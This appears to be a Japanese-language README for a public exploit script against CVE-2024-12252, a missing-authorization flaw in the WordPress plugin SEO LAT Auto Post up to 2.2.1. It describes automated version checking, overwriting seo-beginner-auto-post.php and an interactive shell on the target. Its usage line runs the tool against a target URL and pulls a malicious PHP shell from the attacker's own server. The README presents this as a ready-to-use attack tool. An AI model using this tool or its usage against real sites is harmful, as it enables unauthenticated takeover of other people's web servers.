
SEO LAT Auto Post <= 2.2.1 - 認可の欠如によるファイルの上書き/アップロード (リモートコード実行)
WordPress用SEO LAT Auto Postプラグインは、バージョン2.2.1以前のすべてのバージョンにおいて、remote_update AJAXアクションに対する権限チェックが欠如しているため、ファイルの上書きが可能です。これにより、未認証の攻撃者がseo-beginner-auto-post.phpファイルを上書きでき、それを利用してリモートコード実行を達成できる可能性があります。
このスクリプトは、SEO LAT Auto Postプラグインの脆弱性を悪用し、seo-beginner-auto-post.phpファイルを上書きすることでリモートコード実行を達成します。このスクリプトは、プラグインのバージョン確認、エクスプロイトの発動、コマンド実行のための対話型シェルの提供を自動化します。
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
ターゲットのURLと、悪意のあるPHPシェルへの直接URLを指定してスクリプトを実行します:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php